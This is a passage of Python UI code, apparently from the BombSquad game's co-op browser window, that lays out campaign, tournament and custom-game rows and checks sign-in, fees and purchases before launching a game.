            fee_var = 'price.tournament_entry_1'
        else:
            if fee != 0:
                print('Unknown fee value:', fee)
            fee_var = 'price.tournament_entry_0'
        tbtn['allow_ads'] = allow_ads = entry['allowAds']
        final_fee: Optional[int] = (None if fee_var is None else
                                    _ba.get_account_misc_read_val(
                                        fee_var, '?'))
        final_fee_str: Union[str, ba.Lstr]
        if fee_var is None:
            final_fee_str = ''
        else:
            if final_fee == 0:
                final_fee_str = ba.Lstr(
                    resource='getTicketsWindow.freeText')
            else:
                final_fee_str = (
                    ba.charstr(ba.SpecialChar.TICKET_BACKING) +
                    str(final_fee))
        ad_tries_remaining = ba.app.accounts.tournament_info[
            tbtn['tournament_id']]['adTriesRemaining']
        free_tries_remaining = ba.app.accounts.tournament_info[
            tbtn['tournament_id']]['freeTriesRemaining']
        # Now, if this fee allows ads and we support video ads, show
        # the 'or ad' version.
        if allow_ads and _ba.has_video_ads():
            ads_enabled = _ba.have_incentivized_ad()
            ba.imagewidget(edit=tbtn['entry_fee_ad_image'],
                           opacity=1.0 if ads_enabled else 0.25)
            or_text = ba.Lstr(resource='orText',
                              subs=[('${A}', ''),
                                    ('${B}', '')]).evaluate().strip()
            ba.textwidget(edit=tbtn['entry_fee_text_or'], text=or_text)
            ba.textwidget(
                edit=tbtn['entry_fee_text_top'],
                position=(tbtn['button_x'] + 360,
                          tbtn['button_y'] + tbtn['button_scale_y'] - 60),
                scale=1.3,
                text=final_fee_str)
            # Possibly show number of ad-plays remaining.
            ba.textwidget(
                edit=tbtn['entry_fee_text_remaining'],
                position=(tbtn['button_x'] + 360,
                          tbtn['button_y'] + tbtn['button_scale_y'] - 146),
                text='' if ad_tries_remaining in [None, 0] else
                ('' + str(ad_tries_remaining)),
                color=(0.6, 0.6, 0.6, 1 if ads_enabled else 0.2))
        else:
            ba.imagewidget(edit=tbtn['entry_fee_ad_image'], opacity=0.0)
            ba.textwidget(edit=tbtn['entry_fee_text_or'], text='')
            ba.textwidget(
                edit=tbtn['entry_fee_text_top'],
                position=(tbtn['button_x'] + 360,
                          tbtn['button_y'] + tbtn['button_scale_y'] - 80),
                scale=1.3,
                text=final_fee_str)
            # Possibly show number of free-plays remaining.
            ba.textwidget(
                edit=tbtn['entry_fee_text_remaining'],
                position=(tbtn['button_x'] + 360,
                          tbtn['button_y'] + tbtn['button_scale_y'] - 100),
                text=('' if (free_tries_remaining in [None, 0]
                             or final_fee != 0) else
                      ('' + str(free_tries_remaining))),
                color=(0.6, 0.6, 0.6, 1))
def _on_tournament_query_response(self, data: Optional[Dict[str,
                                                            Any]]) -> None:
    """Digest the server's tournament-query reply and refresh the UI."""
    accounts = ba.app.accounts
    tourneys = None if data is None else data['t']  # 't' used to be the whole payload.
    if data is not None:
        # Remember when we last heard back successfully.
        self._last_tournament_query_response_time = ba.time(
            ba.TimeType.REAL)
        # Keep our cached tourney info up to date, along with the
        # current tourney list/order for this account.
        self._tourney_data_up_to_date = True
        accounts.cache_tournament_info(tourneys)
        accounts.account_tournament_list = (
            _ba.get_account_state_num(),
            [entry['tournamentID'] for entry in tourneys])
    self._doing_tournament_query = False
    self._update_for_data(tourneys)
def _set_campaign_difficulty(self, difficulty: str) -> None:
    """Switch between easy/hard campaigns (hard requires pro options)."""
    # pylint: disable=cyclic-import
    from bastd.ui.purchase import PurchaseWindow
    if difficulty == self._campaign_difficulty:
        # Nothing to change; just give click feedback.
        ba.playsound(ba.getsound('click01'))
        return
    # Hard mode is gated behind pro; offer the upgrade instead.
    if difficulty == 'hard' and not ba.app.accounts.have_pro_options():
        PurchaseWindow(items=['pro'])
        return
    ba.playsound(ba.getsound('gunCocking'))
    if difficulty not in ('easy', 'hard'):
        print('ERROR: invalid campaign difficulty:', difficulty)
        difficulty = 'easy'
    self._campaign_difficulty = difficulty
    _ba.add_transaction({
        'type': 'SET_MISC_VAL',
        'name': 'campaignDifficulty',
        'value': difficulty
    })
    self._refresh_campaign_row()
def _refresh_campaign_row(self) -> None:
    """Rebuild the campaign row: difficulty toggles plus level buttons."""
    # pylint: disable=too-many-locals
    # pylint: disable=cyclic-import
    from ba.internal import getcampaign
    from bastd.ui.coop.gamebutton import GameButton
    parent_widget = self._campaign_sub_container
    # Clear out anything in the parent widget already.
    for child in parent_widget.get_children():
        child.delete()
    next_widget_down = self._tournament_info_button
    h = 0
    v2 = -2
    # Colors distinguishing the active difficulty from the inactive one.
    sel_color = (0.75, 0.85, 0.5)
    sel_color_hard = (0.4, 0.7, 0.2)
    un_sel_color = (0.5, 0.5, 0.5)
    sel_textcolor = (2, 2, 0.8)
    un_sel_textcolor = (0.6, 0.6, 0.6)
    self._easy_button = ba.buttonwidget(
        parent=parent_widget,
        position=(h + 30, v2 + 105),
        size=(120, 70),
        label=ba.Lstr(resource='difficultyEasyText'),
        button_type='square',
        autoselect=True,
        enable_sound=False,
        on_activate_call=ba.Call(self._set_campaign_difficulty, 'easy'),
        on_select_call=ba.Call(self.sel_change, 'campaign', 'easyButton'),
        color=sel_color
        if self._campaign_difficulty == 'easy' else un_sel_color,
        textcolor=sel_textcolor
        if self._campaign_difficulty == 'easy' else un_sel_textcolor)
    ba.widget(edit=self._easy_button, show_buffer_left=100)
    if self._selected_campaign_level == 'easyButton':
        ba.containerwidget(edit=parent_widget,
                           selected_child=self._easy_button,
                           visible_child=self._easy_button)
    lock_tex = ba.gettexture('lock')
    self._hard_button = ba.buttonwidget(
        parent=parent_widget,
        position=(h + 30, v2 + 32),
        size=(120, 70),
        label=ba.Lstr(resource='difficultyHardText'),
        button_type='square',
        autoselect=True,
        enable_sound=False,
        on_activate_call=ba.Call(self._set_campaign_difficulty, 'hard'),
        on_select_call=ba.Call(self.sel_change, 'campaign', 'hardButton'),
        color=sel_color_hard
        if self._campaign_difficulty == 'hard' else un_sel_color,
        textcolor=sel_textcolor
        if self._campaign_difficulty == 'hard' else un_sel_textcolor)
    # Lock icon overlaid on the hard button; visibility managed by
    # _update_hard_mode_lock_image().
    self._hard_button_lock_image = ba.imagewidget(
        parent=parent_widget,
        size=(30, 30),
        draw_controller=self._hard_button,
        position=(h + 30 - 10, v2 + 32 + 70 - 35),
        texture=lock_tex)
    self._update_hard_mode_lock_image()
    ba.widget(edit=self._hard_button, show_buffer_left=100)
    if self._selected_campaign_level == 'hardButton':
        ba.containerwidget(edit=parent_widget,
                           selected_child=self._hard_button,
                           visible_child=self._hard_button)
    ba.widget(edit=self._hard_button, down_widget=next_widget_down)
    h_spacing = 200
    campaign_buttons = []
    # Level names live in either the 'Easy' or 'Default' campaign.
    if self._campaign_difficulty == 'easy':
        campaignname = 'Easy'
    else:
        campaignname = 'Default'
    items = [
        campaignname + ':Onslaught Training',
        campaignname + ':Rookie Onslaught',
        campaignname + ':Rookie Football', campaignname + ':Pro Onslaught',
        campaignname + ':Pro Football', campaignname + ':Pro Runaround',
        campaignname + ':Uber Onslaught', campaignname + ':Uber Football',
        campaignname + ':Uber Runaround'
    ]
    items += [campaignname + ':The Last Stand']
    if self._selected_campaign_level is None:
        self._selected_campaign_level = items[0]
    h = 150
    for i in items:
        is_last_sel = (i == self._selected_campaign_level)
        campaign_buttons.append(
            GameButton(self, parent_widget, i, h, v2, is_last_sel,
                       'campaign').get_button())
        h += h_spacing
    # Wire up controller/keyboard navigation between the new buttons.
    ba.widget(edit=campaign_buttons[0], left_widget=self._easy_button)
    if self._back_button is not None:
        ba.widget(edit=self._easy_button, up_widget=self._back_button)
        for btn in campaign_buttons:
            ba.widget(edit=btn,
                      up_widget=self._back_button,
                      down_widget=next_widget_down)
    # Update our existing percent-complete text.
    campaign = getcampaign(campaignname)
    levels = campaign.levels
    levels_complete = sum((1 if l.complete else 0) for l in levels)
    # Last level cant be completed; hence the -1.
    progress = min(1.0, float(levels_complete) / (len(levels) - 1))
    p_str = str(int(progress * 100.0)) + '%'
    self._campaign_percent_text = ba.textwidget(
        edit=self._campaign_percent_text,
        text=ba.Lstr(value='${C} (${P})',
                     subs=[('${C}',
                            ba.Lstr(resource=self._r + '.campaignText')),
                           ('${P}', p_str)]))
def _on_tournament_info_press(self) -> None:
    """Show a simple info dialog describing tournaments."""
    # pylint: disable=cyclic-import
    from bastd.ui.confirm import ConfirmWindow
    # No cancel option; the window is anchored to the '?' button.
    ConfirmWindow(ba.Lstr(resource=self._r + '.tournamentInfoText'),
                  cancel_button=False,
                  width=550,
                  height=260,
                  origin_widget=self._tournament_info_button)
def _refresh(self) -> None:
    """(Re)build the window's scrollable content: campaign row,
    tournament rows, and custom-games row, then wire navigation."""
    # pylint: disable=too-many-statements
    # pylint: disable=too-many-branches
    # pylint: disable=too-many-locals
    # pylint: disable=cyclic-import
    from bastd.ui.coop.gamebutton import GameButton

    # (Re)create the sub-container if need be.
    if self._subcontainer is not None:
        self._subcontainer.delete()
    tourney_row_height = 200
    self._subcontainerheight = (
        620 + self._tournament_button_count * tourney_row_height)
    self._subcontainer = ba.containerwidget(
        parent=self._scrollwidget,
        size=(self._subcontainerwidth, self._subcontainerheight),
        background=False,
        claims_left_right=True,
        claims_tab=True,
        selection_loops_to_parent=True)
    ba.containerwidget(edit=self._root_widget,
                       selected_child=self._scrollwidget)
    if self._back_button is not None:
        ba.containerwidget(edit=self._root_widget,
                           cancel_button=self._back_button)
    w_parent = self._subcontainer
    h_base = 6
    # 'v' walks downward as each section is laid out.
    v = self._subcontainerheight - 73
    self._campaign_percent_text = ba.textwidget(
        parent=w_parent,
        position=(h_base + 27, v + 30),
        size=(0, 0),
        text='',
        h_align='left',
        v_align='center',
        color=ba.app.ui.title_color,
        scale=1.1)
    row_v_show_buffer = 100
    v -= 198

    # Campaign row: a horizontal scroller whose buttons are filled in
    # later by _refresh_campaign_row().
    h_scroll = ba.hscrollwidget(
        parent=w_parent,
        size=(self._scroll_width - 10, 205),
        position=(-5, v),
        simple_culling_h=70,
        highlight=False,
        border_opacity=0.0,
        color=(0.45, 0.4, 0.5),
        on_select_call=lambda: self._on_row_selected('campaign'))
    self._campaign_h_scroll = h_scroll
    ba.widget(edit=h_scroll,
              show_buffer_top=row_v_show_buffer,
              show_buffer_bottom=row_v_show_buffer,
              autoselect=True)
    if self._selected_row == 'campaign':
        ba.containerwidget(edit=w_parent,
                           selected_child=h_scroll,
                           visible_child=h_scroll)
    ba.containerwidget(edit=h_scroll, claims_left_right=True)
    self._campaign_sub_container = ba.containerwidget(
        parent=h_scroll,
        size=(180 + 200 * 10, 200),
        background=False)

    # Tournaments
    self._tournament_buttons: List[Dict[str, Any]] = []
    v -= 53
    # FIXME shouldn't use hard-coded strings here.
    txt = ba.Lstr(resource='tournamentsText',
                  fallback_resource='tournamentText').evaluate()
    t_width = _ba.get_string_width(txt, suppress_warning=True)
    ba.textwidget(parent=w_parent,
                  position=(h_base + 27, v + 30),
                  size=(0, 0),
                  text=txt,
                  h_align='left',
                  v_align='center',
                  color=ba.app.ui.title_color,
                  scale=1.1)
    self._tournament_info_button = ba.buttonwidget(
        parent=w_parent,
        label='?',
        size=(20, 20),
        text_scale=0.6,
        position=(h_base + 27 + t_width * 1.1 + 15, v + 18),
        button_type='square',
        color=(0.6, 0.5, 0.65),
        textcolor=(0.7, 0.6, 0.75),
        autoselect=True,
        up_widget=self._campaign_h_scroll,
        on_activate_call=self._on_tournament_info_press)
    ba.widget(edit=self._tournament_info_button,
              left_widget=self._tournament_info_button,
              right_widget=self._tournament_info_button)

    # Say 'unavailable' if there are zero tournaments, and if we're not
    # signed in add that as well (that's probably why we see
    # no tournaments).
    if self._tournament_button_count == 0:
        unavailable_text = ba.Lstr(resource='unavailableText')
        if _ba.get_account_state() != 'signed_in':
            unavailable_text = ba.Lstr(
                value='${A} (${B})',
                subs=[('${A}', unavailable_text),
                      ('${B}', ba.Lstr(resource='notSignedInText'))])
        ba.textwidget(parent=w_parent,
                      position=(h_base + 47, v),
                      size=(0, 0),
                      text=unavailable_text,
                      h_align='left',
                      v_align='center',
                      color=ba.app.ui.title_color,
                      scale=0.9)
        v -= 40
    v -= 198

    # One horizontal scroll row per tournament slot.
    tournament_h_scroll = None
    if self._tournament_button_count > 0:
        for i in range(self._tournament_button_count):
            tournament_h_scroll = h_scroll = ba.hscrollwidget(
                parent=w_parent,
                size=(self._scroll_width - 10, 205),
                position=(-5, v),
                highlight=False,
                border_opacity=0.0,
                color=(0.45, 0.4, 0.5),
                on_select_call=ba.Call(self._on_row_selected,
                                       'tournament' + str(i + 1)))
            ba.widget(edit=h_scroll,
                      show_buffer_top=row_v_show_buffer,
                      show_buffer_bottom=row_v_show_buffer,
                      autoselect=True)
            if self._selected_row == 'tournament' + str(i + 1):
                ba.containerwidget(edit=w_parent,
                                   selected_child=h_scroll,
                                   visible_child=h_scroll)
            ba.containerwidget(edit=h_scroll, claims_left_right=True)
            sc2 = ba.containerwidget(parent=h_scroll,
                                     size=(self._scroll_width - 24, 200),
                                     background=False)
            h = 0
            v2 = -2
            is_last_sel = True
            self._tournament_buttons.append(
                self._tournament_button(sc2, h, v2, is_last_sel))
            v -= 200

    # Custom Games.
    v -= 50
    ba.textwidget(parent=w_parent,
                  position=(h_base + 27, v + 30 + 198),
                  size=(0, 0),
                  text=ba.Lstr(
                      resource='practiceText',
                      fallback_resource='coopSelectWindow.customText'),
                  h_align='left',
                  v_align='center',
                  color=ba.app.ui.title_color,
                  scale=1.1)
    items = [
        'Challenges:Infinite Onslaught',
        'Challenges:Infinite Runaround',
        'Challenges:Ninja Fight',
        'Challenges:Pro Ninja Fight',
        'Challenges:Meteor Shower',
        'Challenges:Target Practice B',
        'Challenges:Target Practice',
    ]
    # Show easter-egg-hunt either if its easter or we own it.
    if _ba.get_account_misc_read_val(
            'easter', False) or _ba.get_purchased('games.easter_egg_hunt'):
        items = [
            'Challenges:Easter Egg Hunt', 'Challenges:Pro Easter Egg Hunt'
        ] + items
    # add all custom user levels here..
    # items += [
    #     'User:' + l.getname()
    #     for l in getcampaign('User').getlevels()
    # ]
    self._custom_h_scroll = custom_h_scroll = h_scroll = ba.hscrollwidget(
        parent=w_parent,
        size=(self._scroll_width - 10, 205),
        position=(-5, v),
        highlight=False,
        border_opacity=0.0,
        color=(0.45, 0.4, 0.5),
        on_select_call=ba.Call(self._on_row_selected, 'custom'))
    ba.widget(edit=h_scroll,
              show_buffer_top=row_v_show_buffer,
              show_buffer_bottom=1.5 * row_v_show_buffer,
              autoselect=True)
    if self._selected_row == 'custom':
        ba.containerwidget(edit=w_parent,
                           selected_child=h_scroll,
                           visible_child=h_scroll)
    ba.containerwidget(edit=h_scroll, claims_left_right=True)
    sc2 = ba.containerwidget(parent=h_scroll,
                             size=(max(self._scroll_width - 24,
                                       30 + 200 * len(items)), 200),
                             background=False)
    h_spacing = 200
    self._custom_buttons: List[GameButton] = []
    h = 0
    v2 = -2
    for item in items:
        is_last_sel = (item == self._selected_custom_level)
        self._custom_buttons.append(
            GameButton(self, sc2, item, h, v2, is_last_sel, 'custom'))
        h += h_spacing

    # We can't fill in our campaign row until tourney buttons are in place.
    # (for wiring up)
    self._refresh_campaign_row()

    # Chain up/down navigation through the tournament rows.
    for i, tbutton in enumerate(self._tournament_buttons):
        ba.widget(
            edit=tbutton['button'],
            up_widget=self._tournament_info_button
            if i == 0 else self._tournament_buttons[i - 1]['button'],
            down_widget=self._tournament_buttons[(i + 1)]['button']
            if i + 1 < len(self._tournament_buttons) else custom_h_scroll)
        ba.widget(
            edit=tbutton['more_scores_button'],
            down_widget=self._tournament_buttons[(
                i + 1)]['current_leader_name_text']
            if i + 1 < len(self._tournament_buttons) else custom_h_scroll)
        ba.widget(edit=tbutton['current_leader_name_text'],
                  up_widget=self._tournament_info_button if i == 0 else
                  self._tournament_buttons[i - 1]['more_scores_button'])
    for btn in self._custom_buttons:
        try:
            ba.widget(
                edit=btn.get_button(),
                up_widget=tournament_h_scroll if self._tournament_buttons
                else self._tournament_info_button)
        except Exception:
            ba.print_exception('Error wiring up custom buttons.')

    # Hook up the back action (back button, or the window's cancel).
    if self._back_button is not None:
        ba.buttonwidget(edit=self._back_button,
                        on_activate_call=self._back)
    else:
        ba.containerwidget(edit=self._root_widget,
                           on_cancel_call=self._back)

    # There's probably several 'onSelected' callbacks pushed onto the
    # event queue.. we need to push ours too so we're enabled *after* them.
    ba.pushcall(self._enable_selectable_callback)
def _on_row_selected(self, row: str) -> None:
    """Record *row* as selected (once selection callbacks are enabled)."""
    if self._do_selection_callbacks and self._selected_row != row:
        self._selected_row = row
def _enable_selectable_callback(self) -> None:
    """Begin honoring row-selection callbacks (pushed after refresh)."""
    self._do_selection_callbacks = True
def _tournament_button(self, parent: ba.Widget, x: float, y: float,
                       select: bool) -> Dict[str, Any]:
    """Build one tournament row's widgets and return them keyed by name.

    The returned dict also carries per-tournament state fields
    ('tournament_id', 'time_remaining', ...) that are filled in later
    when query data arrives.
    """
    sclx = 300
    scly = 195.0
    data: Dict[str, Any] = {
        'tournament_id': None,
        'time_remaining': 0,
        'has_time_remaining': False,
        'leader': None
    }
    # Main button covering the row's play area; passes this row's data
    # dict through to run().
    data['button'] = btn = ba.buttonwidget(
        parent=parent,
        position=(x + 23, y + 4),
        size=(sclx, scly),
        label='',
        button_type='square',
        autoselect=True,
        on_activate_call=lambda: self.run(None, tournament_button=data))
    ba.widget(edit=btn,
              show_buffer_bottom=50,
              show_buffer_top=50,
              show_buffer_left=400,
              show_buffer_right=200)
    if select:
        ba.containerwidget(edit=parent,
                           selected_child=btn,
                           visible_child=btn)
    # Map preview image plus an (initially hidden) lock overlay.
    image_width = sclx * 0.85 * 0.75
    data['image'] = ba.imagewidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 21 + sclx * 0.5 - image_width * 0.5, y + scly - 150),
        size=(image_width, image_width * 0.5),
        model_transparent=self.lsbt,
        model_opaque=self.lsbo,
        texture=ba.gettexture('black'),
        opacity=0.2,
        mask_texture=ba.gettexture('mapPreviewMask'))
    data['lock_image'] = ba.imagewidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 21 + sclx * 0.5 - image_width * 0.25,
                  y + scly - 150),
        size=(image_width * 0.5, image_width * 0.5),
        texture=ba.gettexture('lock'),
        opacity=0.0)
    data['button_text'] = ba.textwidget(parent=parent,
                                        draw_controller=btn,
                                        position=(x + 20 + sclx * 0.5,
                                                  y + scly - 35),
                                        size=(0, 0),
                                        h_align='center',
                                        text='-',
                                        v_align='center',
                                        maxwidth=sclx * 0.76,
                                        scale=0.85,
                                        color=(0.8, 1.0, 0.8, 1.0))
    header_color = (0.43, 0.4, 0.5, 1)
    value_color = (0.6, 0.6, 0.6, 1)
    # Entry-fee column.
    x_offs = 0
    ba.textwidget(parent=parent,
                  draw_controller=btn,
                  position=(x + 360, y + scly - 20),
                  size=(0, 0),
                  h_align='center',
                  text=ba.Lstr(resource=self._r + '.entryFeeText'),
                  v_align='center',
                  maxwidth=100,
                  scale=0.9,
                  color=header_color,
                  flatness=1.0)
    data['entry_fee_text_top'] = ba.textwidget(parent=parent,
                                               draw_controller=btn,
                                               position=(x + 360,
                                                         y + scly - 60),
                                               size=(0, 0),
                                               h_align='center',
                                               text='-',
                                               v_align='center',
                                               maxwidth=60,
                                               scale=1.3,
                                               color=value_color,
                                               flatness=1.0)
    data['entry_fee_text_or'] = ba.textwidget(parent=parent,
                                              draw_controller=btn,
                                              position=(x + 360,
                                                        y + scly - 90),
                                              size=(0, 0),
                                              h_align='center',
                                              text='',
                                              v_align='center',
                                              maxwidth=60,
                                              scale=0.5,
                                              color=value_color,
                                              flatness=1.0)
    data['entry_fee_text_remaining'] = ba.textwidget(parent=parent,
                                                     draw_controller=btn,
                                                     position=(x + 360, y +
                                                               scly - 90),
                                                     size=(0, 0),
                                                     h_align='center',
                                                     text='',
                                                     v_align='center',
                                                     maxwidth=60,
                                                     scale=0.5,
                                                     color=value_color,
                                                     flatness=1.0)
    # 'Watch an ad' alternative-fee icon; hidden until fee data arrives.
    data['entry_fee_ad_image'] = ba.imagewidget(
        parent=parent,
        size=(40, 40),
        draw_controller=btn,
        position=(x + 360 - 20, y + scly - 140),
        opacity=0.0,
        texture=ba.gettexture('tv'))
    # Prizes column.
    x_offs += 50
    ba.textwidget(parent=parent,
                  draw_controller=btn,
                  position=(x + 447 + x_offs, y + scly - 20),
                  size=(0, 0),
                  h_align='center',
                  text=ba.Lstr(resource=self._r + '.prizesText'),
                  v_align='center',
                  maxwidth=130,
                  scale=0.9,
                  color=header_color,
                  flatness=1.0)
    # Geometry stashed for later repositioning of fee texts.
    data['button_x'] = x
    data['button_y'] = y
    data['button_scale_y'] = scly
    xo2 = 0
    prize_value_scale = 1.5
    data['prize_range_1_text'] = ba.textwidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 355 + xo2 + x_offs, y + scly - 93),
        size=(0, 0),
        h_align='right',
        v_align='center',
        maxwidth=50,
        text='-',
        scale=0.8,
        color=header_color,
        flatness=1.0)
    data['prize_value_1_text'] = ba.textwidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 380 + xo2 + x_offs, y + scly - 93),
        size=(0, 0),
        h_align='left',
        text='-',
        v_align='center',
        maxwidth=100,
        scale=prize_value_scale,
        color=value_color,
        flatness=1.0)
    data['prize_range_2_text'] = ba.textwidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 355 + xo2 + x_offs, y + scly - 93),
        size=(0, 0),
        h_align='right',
        v_align='center',
        maxwidth=50,
        scale=0.8,
        color=header_color,
        flatness=1.0)
    data['prize_value_2_text'] = ba.textwidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 380 + xo2 + x_offs, y + scly - 93),
        size=(0, 0),
        h_align='left',
        text='',
        v_align='center',
        maxwidth=100,
        scale=prize_value_scale,
        color=value_color,
        flatness=1.0)
    data['prize_range_3_text'] = ba.textwidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 355 + xo2 + x_offs, y + scly - 93),
        size=(0, 0),
        h_align='right',
        v_align='center',
        maxwidth=50,
        scale=0.8,
        color=header_color,
        flatness=1.0)
    data['prize_value_3_text'] = ba.textwidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 380 + xo2 + x_offs, y + scly - 93),
        size=(0, 0),
        h_align='left',
        text='',
        v_align='center',
        maxwidth=100,
        scale=prize_value_scale,
        color=value_color,
        flatness=1.0)
    # Current-best (leader) column.
    ba.textwidget(parent=parent,
                  draw_controller=btn,
                  position=(x + 620 + x_offs, y + scly - 20),
                  size=(0, 0),
                  h_align='center',
                  text=ba.Lstr(resource=self._r + '.currentBestText'),
                  v_align='center',
                  maxwidth=180,
                  scale=0.9,
                  color=header_color,
                  flatness=1.0)
    data['current_leader_name_text'] = ba.textwidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 620 + x_offs - (170 / 1.4) * 0.5,
                  y + scly - 60 - 40 * 0.5),
        selectable=True,
        click_activate=True,
        autoselect=True,
        on_activate_call=lambda: self._show_leader(tournament_button=data),
        size=(170 / 1.4, 40),
        h_align='center',
        text='-',
        v_align='center',
        maxwidth=170,
        scale=1.4,
        color=value_color,
        flatness=1.0)
    data['current_leader_score_text'] = ba.textwidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 620 + x_offs, y + scly - 113 + 10),
        size=(0, 0),
        h_align='center',
        text='-',
        v_align='center',
        maxwidth=170,
        scale=1.8,
        color=value_color,
        flatness=1.0)
    data['more_scores_button'] = ba.buttonwidget(
        parent=parent,
        position=(x + 620 + x_offs - 60, y + scly - 50 - 125),
        color=(0.5, 0.5, 0.6),
        textcolor=(0.7, 0.7, 0.8),
        label='-',
        size=(120, 40),
        autoselect=True,
        up_widget=data['current_leader_name_text'],
        text_scale=0.6,
        on_activate_call=lambda: self._show_scores(tournament_button=data))
    ba.widget(edit=data['current_leader_name_text'],
              down_widget=data['more_scores_button'])
    # Time-remaining column.
    ba.textwidget(parent=parent,
                  draw_controller=btn,
                  position=(x + 820 + x_offs, y + scly - 20),
                  size=(0, 0),
                  h_align='center',
                  text=ba.Lstr(resource=self._r + '.timeRemainingText'),
                  v_align='center',
                  maxwidth=180,
                  scale=0.9,
                  color=header_color,
                  flatness=1.0)
    data['time_remaining_value_text'] = ba.textwidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 820 + x_offs, y + scly - 68),
        size=(0, 0),
        h_align='center',
        text='-',
        v_align='center',
        maxwidth=180,
        scale=2.0,
        color=value_color,
        flatness=1.0)
    data['time_remaining_out_of_text'] = ba.textwidget(
        parent=parent,
        draw_controller=btn,
        position=(x + 820 + x_offs, y + scly - 110),
        size=(0, 0),
        h_align='center',
        text='-',
        v_align='center',
        maxwidth=120,
        scale=0.72,
        color=(0.4, 0.4, 0.5),
        flatness=1.0)
    return data
def _switch_to_league_rankings(self) -> None:
    """Transition out to the league-rankings window."""
    # pylint: disable=cyclic-import
    from bastd.ui.account import show_sign_in_prompt
    from bastd.ui.league.rankwindow import LeagueRankWindow
    # League rankings require a signed-in account.
    if _ba.get_account_state() != 'signed_in':
        show_sign_in_prompt()
        return
    self._save_state()
    ba.containerwidget(edit=self._root_widget, transition='out_left')
    assert self._league_rank_button is not None
    origin = self._league_rank_button.get_button()
    ba.app.ui.set_main_menu_window(
        LeagueRankWindow(origin_widget=origin).get_root_widget())
def _switch_to_score(
    self,
    show_tab: Optional[
        StoreBrowserWindow.TabID] = StoreBrowserWindow.TabID.EXTRAS
) -> None:
    """Transition out to the store window, opening *show_tab*."""
    # pylint: disable=cyclic-import
    from bastd.ui.account import show_sign_in_prompt
    # The store requires a signed-in account.
    if _ba.get_account_state() != 'signed_in':
        show_sign_in_prompt()
        return
    self._save_state()
    ba.containerwidget(edit=self._root_widget, transition='out_left')
    assert self._store_button is not None
    window = StoreBrowserWindow(
        origin_widget=self._store_button.get_button(),
        show_tab=show_tab,
        back_location='CoopBrowserWindow')
    ba.app.ui.set_main_menu_window(window.get_root_widget())
def _show_leader(self, tournament_button: Dict[str, Any]) -> None:
    """Pop up an account viewer for this tournament's current leader."""
    # pylint: disable=cyclic-import
    from bastd.ui.account.viewer import AccountViewerWindow
    tournament_id = tournament_button['tournament_id']
    leader = tournament_button['leader']
    # FIXME: This assumes a single player entry in leader; should
    #  expand this to work with multiple.
    if tournament_id is None or leader is None or len(leader[2]) != 1:
        ba.playsound(ba.getsound('error'))
        return
    ba.playsound(ba.getsound('swish'))
    player = leader[2][0]
    AccountViewerWindow(
        account_id=player.get('a', None),
        profile_id=player.get('p', None),
        position=(tournament_button['current_leader_name_text'].
                  get_screen_space_center()))
def _show_scores(self, tournament_button: Dict[str, Any]) -> None:
    """Pop up the full scores list for this tournament row."""
    # pylint: disable=cyclic-import
    from bastd.ui.tournamentscores import TournamentScoresWindow
    tournament_id = tournament_button['tournament_id']
    if tournament_id is None:
        ba.playsound(ba.getsound('error'))
        return
    anchor = tournament_button['more_scores_button']
    TournamentScoresWindow(
        tournament_id=tournament_id,
        position=anchor.get_screen_space_center())
def is_tourney_data_up_to_date(self) -> bool:
    """Return whether our cached tournament data is current."""
    up_to_date: bool = self._tourney_data_up_to_date
    return up_to_date
def run(self,
        game: Optional[str],
        tournament_button: Optional[Dict[str, Any]] = None) -> None:
    """Run the provided game.

    If *tournament_button* is given, that tournament's own game is run
    instead (after sign-in / fee / league / time pre-flight checks).
    """
    # pylint: disable=too-many-branches
    # pylint: disable=too-many-statements
    # pylint: disable=too-many-return-statements
    # pylint: disable=cyclic-import
    from bastd.ui.confirm import ConfirmWindow
    from bastd.ui.tournamententry import TournamentEntryWindow
    from bastd.ui.purchase import PurchaseWindow
    from bastd.ui.account import show_sign_in_prompt
    args: Dict[str, Any] = {}

    # Do a bit of pre-flight for tournament options.
    if tournament_button is not None:
        if _ba.get_account_state() != 'signed_in':
            show_sign_in_prompt()
            return
        if not self._tourney_data_up_to_date:
            ba.screenmessage(
                ba.Lstr(resource='tournamentCheckingStateText'),
                color=(1, 1, 0))
            ba.playsound(ba.getsound('error'))
            return
        if tournament_button['tournament_id'] is None:
            ba.screenmessage(
                ba.Lstr(resource='internal.unavailableNoConnectionText'),
                color=(1, 0, 0))
            ba.playsound(ba.getsound('error'))
            return
        if tournament_button['required_league'] is not None:
            ba.screenmessage(ba.Lstr(
                resource='league.tournamentLeagueText',
                subs=[
                    ('${NAME}',
                     ba.Lstr(
                         translate=('leagueNames',
                                    tournament_button['required_league'])))
                ]),
                             color=(1, 0, 0))
            ba.playsound(ba.getsound('error'))
            return
        if tournament_button['time_remaining'] <= 0:
            ba.screenmessage(ba.Lstr(resource='tournamentEndedText'),
                             color=(1, 0, 0))
            ba.playsound(ba.getsound('error'))
            return
        # Game is whatever the tournament tells us it is.
        game = ba.app.accounts.tournament_info[
            tournament_button['tournament_id']]['game']
    if tournament_button is None and game == 'Easy:The Last Stand':
        ConfirmWindow(ba.Lstr(resource='difficultyHardUnlockOnlyText',
                              fallback_resource='difficultyHardOnlyText'),
                      cancel_button=False,
                      width=460,
                      height=130)
        return

    # Infinite onslaught/runaround require pro; bring up a store link if
    # need be.
    if tournament_button is None and game in (
            'Challenges:Infinite Runaround',
            'Challenges:Infinite Onslaught'
    ) and not ba.app.accounts.have_pro():
        if _ba.get_account_state() != 'signed_in':
            show_sign_in_prompt()
        else:
            PurchaseWindow(items=['pro'])
        return

    # Map certain games to the one-off purchase that unlocks them.
    required_purchase: Optional[str]
    if game in ['Challenges:Meteor Shower']:
        required_purchase = 'games.meteor_shower'
    elif game in [
            'Challenges:Target Practice', 'Challenges:Target Practice B'
    ]:
        required_purchase = 'games.target_practice'
    elif game in ['Challenges:Ninja Fight']:
        required_purchase = 'games.ninja_fight'
    elif game in ['Challenges:Pro Ninja Fight']:
        required_purchase = 'games.ninja_fight'
    elif game in [
            'Challenges:Easter Egg Hunt', 'Challenges:Pro Easter Egg Hunt'
    ]:
